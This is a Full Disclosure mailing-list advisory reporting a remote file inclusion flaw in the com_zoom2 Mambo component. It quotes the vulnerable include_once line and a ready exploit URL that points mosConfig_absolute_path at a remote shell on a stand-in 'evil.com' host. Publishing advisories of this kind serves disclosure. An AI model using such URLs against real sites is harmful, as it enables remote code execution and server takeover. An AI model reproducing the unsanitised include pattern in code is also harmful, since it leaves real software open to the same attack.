Full Disclosure: com_zoom2 Mambo Module Remote File Include Vulnerability

["0o_zeus_o0 elitemexico.org" <zeus.olimpusklan () gmail com>]

com_zoom2 Mambo Module Remote File Include Vulnerability

##################

autor:0o_zeus_o0
website:www.diosdelared.com
mail:zeus () diosdelared com
10/04/07

##################################

/components/com_zoom2/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http:/evil.com/shell.gif?

include_once("$mosConfig_absolute_path/components/com_zoom/classes/iptc/EXIF.php");

site download :
http://mamboxchange.com/frs/download.php/3740/com_zoom_25_Beta.zip

###################################################

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/